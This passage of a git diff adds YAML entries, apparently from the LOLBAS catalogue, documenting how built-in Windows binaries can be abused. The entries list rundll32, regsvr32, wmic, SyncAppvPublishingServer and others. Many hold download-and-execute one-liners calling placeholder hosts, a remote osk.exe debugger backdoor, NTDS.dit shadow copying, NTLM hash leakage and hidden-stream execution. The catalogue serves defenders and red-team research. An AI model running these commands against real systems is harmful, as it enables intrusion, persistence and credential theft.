+  - https://twitter.com/KyleHanslovan/status/912659279806640128
+Notes: |
+    Thanks to:
+    fab - @0rbz_
+    Kyle Hanslovan - @KyleHanslovan
+
diff --git a/OSBinaries/Pcwrun.yml b/OSBinaries/Pcwrun.yml
new file mode 100644
index 0000000..2afd5db
--- /dev/null
+++ b/OSBinaries/Pcwrun.yml
@@ -0,0 +1,17 @@
+---
+Name: Pcwrun.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Pcwrun.exe c:\temp\beacon.exe
+    Description: Open the target .EXE file with the Program Compatibility Wizard.
+Full Path:
+  - c:\windows\system32\pcwrun.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/991335019833708544
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+
diff --git a/OSBinaries/Powershell.yml b/OSBinaries/Powershell.yml
new file mode 100644
index 0000000..c62bf48
--- /dev/null
+++ b/OSBinaries/Powershell.yml
@@ -0,0 +1,18 @@
+---
+Name: Powershell.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: powershell -ep bypass - < c:\temp:ttt
+    Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
+Full Path:
+  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
+  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Moriarty_Meng/status/984380793383370752
+Notes: Thanks to Moriarty - @Moriarty_Meng
+
diff --git a/OSBinaries/Presentationhost.yml b/OSBinaries/Presentationhost.yml
new file mode 100644
index 0000000..4461ccc
--- /dev/null
+++ b/OSBinaries/Presentationhost.yml
@@ -0,0 +1,19 @@
+---
+Name: PresentationHost.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Presentationhost.exe C:\temp\Evil.xbap
+    Description: Executes the target XAML Browser Application (XBAP) file.
+Full Path:
+  - 'c:\windows\system32\PresentationHost.exe     '
+  - 'c:\windows\sysWOW64\PresentationHost.exe    '
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
+  - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Print.yml b/OSBinaries/Print.yml
new file mode 100644
index 0000000..2dca5c2
--- /dev/null
+++ b/OSBinaries/Print.yml
@@ -0,0 +1,23 @@
+---
+Name: Print.exe
+Description: Download, Copy, Add ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
+    Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
+  - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
+    Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
+  - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
+    Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
+Full Path:
+  - C:\Windows\System32\print.exe
+  - C:\Windows\SysWOW64\print.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Oddvarmoe/status/985518877076541440
+  - https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
+Notes: Thanks to Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Psr.yml b/OSBinaries/Psr.yml
new file mode 100644
index 0000000..32a4b1e
--- /dev/null
+++ b/OSBinaries/Psr.yml
@@ -0,0 +1,22 @@
+---
+Name: Psr.exe
+Description: Surveillance
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
+    Description: Capture screenshots of the desktop and save them in the target .ZIP file.
+  - Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
+    Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
+  - Command: psr.exe /stop
+    Description: Stop the Problem Step Recorder.
+Full Path:
+  - C:\Windows\System32\Psr.exe
+  - C:\Windows\SysWOW64\Psr.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
+Notes: 'Thanks to '
+
diff --git a/OSBinaries/Reg.yml b/OSBinaries/Reg.yml
new file mode 100644
index 0000000..90eb292
--- /dev/null
+++ b/OSBinaries/Reg.yml
@@ -0,0 +1,18 @@
+---
+Name: reg.exe
+Description: Export Reg, Add ADS, Import Reg
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
+    Description: Export the target Registry key and save it to the specified .REG file.
+Full Path:
+  - c:\windows\system32\reg.exe
+  - c:\windows\sysWOW64\reg.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Notes: Thanks to Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Regasm.yml b/OSBinaries/Regasm.yml
new file mode 100644
index 0000000..04d1966
--- /dev/null
+++ b/OSBinaries/Regasm.yml
@@ -0,0 +1,25 @@
+---
+Name: Regasm.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: regasm.exe /U AllTheThingsx64.dll
+    Description: Loads the target .DLL file and executes the UnRegisterClass function.
+  - Command: regasm.exe AllTheThingsx64.dll
+    Description: Loads the target .DLL file and executes the RegisterClass function.
+Full Path:
+  - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
+  - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
+  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
+  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
+  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Regedit.yml b/OSBinaries/Regedit.yml
new file mode 100644
index 0000000..b88def4
--- /dev/null
+++ b/OSBinaries/Regedit.yml
@@ -0,0 +1,20 @@
+---
+Name: regedit.exe
+Description: Write ADS, Read ADS, Import registry
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+    Description: Export the target Registry key to the specified .REG file.
+  - Command: regedit C:\ads\file.txt:regfile.reg"
+    Description: Import the target .REG file into the Registry.
+Full Path:
+  - C:\Windows\System32\regedit.exe
+  - C:\Windows\SysWOW64\regedit.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Notes: Thanks to Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Register-cimprovider.yml b/OSBinaries/Register-cimprovider.yml
new file mode 100644
index 0000000..0db2e3e
--- /dev/null
+++ b/OSBinaries/Register-cimprovider.yml
@@ -0,0 +1,18 @@
+---
+Name: Register-cimprovider.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Register-cimprovider -path "C:\folder\evil.dll"
+    Description: Load the target .DLL.
+Full Path:
+  - c:\windows\system32\Register-cimprovider.exe
+  - c:\windows\sysWOW64\Register-cimprovider.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/PhilipTsukerman/status/992021361106268161
+Notes: Thanks to PhilipTsukerman - @PhilipTsukerman
+
diff --git a/OSBinaries/Regsvcs.yml b/OSBinaries/Regsvcs.yml
new file mode 100644
index 0000000..685d988
--- /dev/null
+++ b/OSBinaries/Regsvcs.yml
@@ -0,0 +1,23 @@
+---
+Name: Regsvcs.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: regsvcs.exe AllTheThingsx64.dll
+    Description: Loads the target .DLL file and executes the RegisterClass function.
+Full Path:
+  - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
+  - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
+  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
+  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
+  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Regsvr32.yml b/OSBinaries/Regsvr32.yml
new file mode 100644
index 0000000..1347c93
--- /dev/null
+++ b/OSBinaries/Regsvr32.yml
@@ -0,0 +1,22 @@
+---
+Name: Regsvr32.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+    Description: Execute the specified remote .SCT script with scrobj.dll.
+  - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll
+    Description: Execute the specified local .SCT script with scrobj.dll.
+Full Path:
+  - C:\Windows\System32\regsvr32.exe
+  - C:\Windows\SysWOW64\regsvr32.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
+  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+  - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Replace.yml b/OSBinaries/Replace.yml
new file mode 100644
index 0000000..dd00da6
--- /dev/null
+++ b/OSBinaries/Replace.yml
@@ -0,0 +1,21 @@
+---
+Name: Replace.exe
+Description: Copy, Download
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: replace.exe C:\Source\File.cab C:\Destination /A
+    Description: Copy the specified file to the destination folder.
+  - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
+    Description: Copy the specified file to the destination folder.
+Full Path:
+  - C:\Windows\System32\replace.exe
+  - C:\Windows\SysWOW64\replace.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/elceef/status/986334113941655553
+  - https://twitter.com/elceef/status/986842299861782529
+Notes: Thanks to elceef - @elceef
+
diff --git a/OSBinaries/Robocopy.yml b/OSBinaries/Robocopy.yml
new file mode 100644
index 0000000..7f7d425
--- /dev/null
+++ b/OSBinaries/Robocopy.yml
@@ -0,0 +1,20 @@
+---
+Name: Robocopy.exe
+Description: Copy
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
+    Description: Copy the entire contents of the SourceFolder to the DestFolder.
+  - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
+    Description: Copy the entire contents of the SourceFolder to the DestFolder.
+Full Path:
+  - c:\windows\system32\binary.exe
+  - c:\windows\sysWOW64\binary.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
+Notes: Thanks to Name of guy - @twitterhandle
+
diff --git a/OSBinaries/Rpcping.yml b/OSBinaries/Rpcping.yml
new file mode 100644
index 0000000..8ac1eab
--- /dev/null
+++ b/OSBinaries/Rpcping.yml
@@ -0,0 +1,25 @@
+---
+Name: Rpcping.exe
+Description: Credentials
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rpcping -s 127.0.0.1 -t ncacn_np
+    Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
+  - Command: rpcping -s 192.168.1.10 -ncacn_np
+    Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
+  - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
+    Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
+Full Path:
+  - C:\Windows\System32\rpcping.exe
+  - C:\Windows\SysWOW64\rpcping.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subtee/status/872797890539913216
+  - https://github.com/vysec/RedTips
+  - https://twitter.com/vysecurity/status/974806438316072960
+  - https://twitter.com/vysecurity/status/873181705024266241
+Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity
+
diff --git a/OSBinaries/Rundll32.yml b/OSBinaries/Rundll32.yml
new file mode 100644
index 0000000..494b4bb
--- /dev/null
+++ b/OSBinaries/Rundll32.yml
@@ -0,0 +1,32 @@
+---
+Name: Rundll32.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe AllTheThingsx64,EntryPoint
+    Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
+  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
+    Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
+  - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
+    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
+  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
+    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
+  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
+    Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
+  - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
+    Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
+Full Path:
+  - C:\Windows\System32\rundll32.exe
+  - C:\Windows\SysWOW64\rundll32.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
+  - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
+  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+  - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Runonce.yml b/OSBinaries/Runonce.yml
new file mode 100644
index 0000000..9d32bb5
--- /dev/null
+++ b/OSBinaries/Runonce.yml
@@ -0,0 +1,20 @@
+---
+Name: Runonce.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Runonce.exe /AlternateShellStartup
+    Description: Executes a Run Once Task that has been configured in the registry.
+Full Path:
+  - c:\windows\system32\runonce.exe
+  - c:\windows\sysWOW64\runonce.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/990717080805789697
+  - https://cmatskas.com/configure-a-runonce-task-on-windows/
+Notes: |
+    Thanks to Pierre-Alexandre Braeken - @pabraeken
+    Requires Administrative access.
diff --git a/OSBinaries/Runscripthelper.yml b/OSBinaries/Runscripthelper.yml
new file mode 100644
index 0000000..5c25cc7
--- /dev/null
+++ b/OSBinaries/Runscripthelper.yml
@@ -0,0 +1,17 @@
+---
+Name: Runscripthelper.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
+    Description: Execute the PowerShell script named test.txt.
+Full Path:
+  - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe    '
+  - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe     '
+Code Sample: []
+Detection: []
+Resources:
+  - https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
+Notes: Thanks to Matt Graeber - @mattifestation
diff --git a/OSBinaries/Sc.yml b/OSBinaries/Sc.yml
new file mode 100644
index 0000000..d2277f3
--- /dev/null
+++ b/OSBinaries/Sc.yml
@@ -0,0 +1,19 @@
+---
+Name: SC.exe
+Description: Execute, Read ADS, Create Service, Start Service
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: |
+          sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
+          sc start evilservice
+    Description: ''
+Full Path:
+  - C:\Windows\System32\sc.exe
+  - C:\Windows\SysWOW64\sc.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+Notes: Thanks to Oddvar Moe - @oddvarmoe
diff --git a/OSBinaries/Scriptrunner.yml b/OSBinaries/Scriptrunner.yml
new file mode 100644
index 0000000..ea21da1
--- /dev/null
+++ b/OSBinaries/Scriptrunner.yml
@@ -0,0 +1,21 @@
+---
+Name: Scriptrunner.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Scriptrunner.exe -appvscript calc.exe
+    Description: Execute calc.exe.
+  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
+    Description: Execute the calc.cmd script on the remote share.
+Full Path:
+  - c:\windows\system32\scriptrunner.exe
+  - c:\windows\sysWOW64\scriptrunner.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/KyleHanslovan/status/914800377580503040
+  - https://twitter.com/NickTyrer/status/914234924655312896
+  - https://github.com/MoooKitty/Code-Execution
+Notes: Thanks to Nick Tyrer - @NickTyrer
diff --git a/OSBinaries/Syncappvpublishingserver.yml b/OSBinaries/Syncappvpublishingserver.yml
new file mode 100644
index 0000000..a284590
--- /dev/null
+++ b/OSBinaries/Syncappvpublishingserver.yml
@@ -0,0 +1,16 @@
+---
+Name: SyncAppvPublishingServer.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
+    Description: Example command on how inject Powershell code into the process
+Full Path:
+  - C:\Windows\System32\SyncAppvPublishingServer.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/monoxgas/status/895045566090010624
+Notes: Thanks to Nick Landers - @monoxgas
diff --git a/OSBinaries/Wab.yml b/OSBinaries/Wab.yml
new file mode 100644
index 0000000..dba8f83
--- /dev/null
+++ b/OSBinaries/Wab.yml
@@ -0,0 +1,20 @@
+---
+Name: Wab.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Wab.exe
+    Description: Loads a DLL configured in the registry under HKLM.
+Full Path:
+  - 'C:\Program Files\Windows Mail\wab.exe    '
+  - 'C:\Program Files (x86)\Windows Mail\wab.exe    '
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
+  - https://twitter.com/Hexacorn/status/991447379864932352
+Notes: |
+    Thanks to Adam - @Hexacorn
+    Requires registry changes, Requires Administrative Access
diff --git a/OSBinaries/Wmic.yml b/OSBinaries/Wmic.yml
new file mode 100644
index 0000000..d49bfc1
--- /dev/null
+++ b/OSBinaries/Wmic.yml
@@ -0,0 +1,46 @@
+---
+Name: WMIC.exe
+Description: Reconnaissance, Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: wmic.exe process call create calc
+    Description: Execute calc.exe.
+  - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
+    Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
+  - Command: wmic.exe useraccount get /ALL
+    Description: List the user accounts on the machine.
+  - Command: wmic.exe process get caption,executablepath,commandline
+    Description: Gets the command line used to execute a running program.
+  - Command: wmic.exe qfe get description,installedOn /format:csv
+    Description: Gets a list of installed Windows updates.
+  - Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
+    Description: Check to see if the target system is running SQL.
+  - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
+    Description: Use the PowerShell cmdlet to list the shares on a remote server.
+  - Command: wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
+    Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
+  - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
+    Description: Execute evil.exe on the remote system.
+  - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
+    Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
+  - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
+    Description: Create a volume shadow copy of NTDS.dit that can be copied.
+  - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
+    Description: Execute a script contained in the target .XSL file hosted on a remote server.
+  - Command: wmic.exe os get /format:"MYXSLFILE.xsl"
+    Description: Executes JScript or VBScript embedded in the target XSL stylesheet.
+  - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
+    Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
+
+Full Path:
+  - c:\windows\system32\wbem\wmic.exe
+  - c:\windows\sysWOW64\wbem\wmic.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
+  - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
+  - https://twitter.com/subTee/status/986234811944648707
+Notes: Thanks to Casey Smith - @subtee
diff --git a/OSBinaries/Wscript.yml b/OSBinaries/Wscript.yml
new file mode 100644
index 0000000..989c166
--- /dev/null
+++ b/OSBinaries/Wscript.yml
@@ -0,0 +1,17 @@
+---
+Name: Wscript.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: wscript c:\ads\file.txt:script.vbs
+    Description: Executes the .VBS script stored as an Alternate Data Stream (ADS).
+Full Path:
+  - c:\windows\system32\wscript.exe
+  - c:\windows\sysWOW64\wscript.exe
+Code Sample: []
+Detection: []
+Resources:
+  - '?'
+Notes: Thanks to ?
diff --git a/OSBinaries/Xwizard.yml b/OSBinaries/Xwizard.yml
new file mode 100644
index 0000000..b5f5d0d
--- /dev/null
+++ b/OSBinaries/Xwizard.yml
@@ -0,0 +1,21 @@
+---
+Name: Xwizard.exe
+Description: DLL hijack, Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: xwizard.exe
+    Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.
+  - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
+    Description: Xwizard.exe running a custom class that has been added to the registry.
+Full Path:
+  - c:\windows\system32\xwizard.exe
+  - c:\windows\sysWOW32\xwizard.exe
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
+  - https://www.youtube.com/watch?v=LwDHX7DVHWU
+  - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
+Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer
diff --git a/OSLibraries/Advpack.yml b/OSLibraries/Advpack.yml
new file mode 100644
index 0000000..25106bd
--- /dev/null
+++ b/OSLibraries/Advpack.yml
@@ -0,0 +1,30 @@
+---
+Name: Advpack.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
+    Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
+  - Command: rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
+    Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
+  - Command: rundll32.exe Advpack.dll,RegisterOCX calc.exe
+    Description: Launch executable by calling the RegisterOCX function.
+  - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
+    Description: Launch executable by calling the RegisterOCX function.
+  - Command: rundll32.exe Advpack.dll,RegisterOCX test.dll
+    Description: Launch a DLL payload by calling the RegisterOCX function.
+Full Path:
+  - c:\windows\system32\advpack.dll
+  - c:\windows\sysWOW64\advpack.dll
+Code Sample:
+  - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack.inf
+  - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
+Detection: []
+Resources:
+  - https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
+  - https://twitter.com/ItsReallyNick/status/967859147977850880
+  - https://twitter.com/bohops/status/974497123101179904
+  - https://twitter.com/moriarty_meng/status/977848311603380224
+Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)
diff --git a/OSLibraries/Ieadvpack.yml b/OSLibraries/Ieadvpack.yml
new file mode 100644
index 0000000..044af4b
--- /dev/null
+++ b/OSLibraries/Ieadvpack.yml
@@ -0,0 +1,28 @@
+---
+Name: Ieadvpack.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
+    Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
+  - Command: rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
+    Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
+  - Command: rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
+    Description: Launch executable by calling the RegisterOCX function.
+  - Command: rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
+    Description: Launch a DLL payload by calling the RegisterOCX function.
+Full Path:
+  - c:\windows\system32\ieadvpack.dll
+  - c:\windows\sysWOW64\ieadvpack.dll
+Code Sample:
+  - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack.inf
+  - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/991695411902599168
+  - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
+  - https://twitter.com/0rbz_/status/974472392012689408
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)
+
diff --git a/OSLibraries/Ieframe.yml b/OSLibraries/Ieframe.yml
new file mode 100644
index 0000000..ab7eb56
--- /dev/null
+++ b/OSLibraries/Ieframe.yml
@@ -0,0 +1,22 @@
+---
+Name: Ieframe.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
+    Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+  - Command: rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
+    Description: Renamed URL file.
+Full Path:
+  - c:\windows\system32\Ieframe.dll
+  - c:\windows\sysWOW64\Ieframe.dll
+Code Sample:
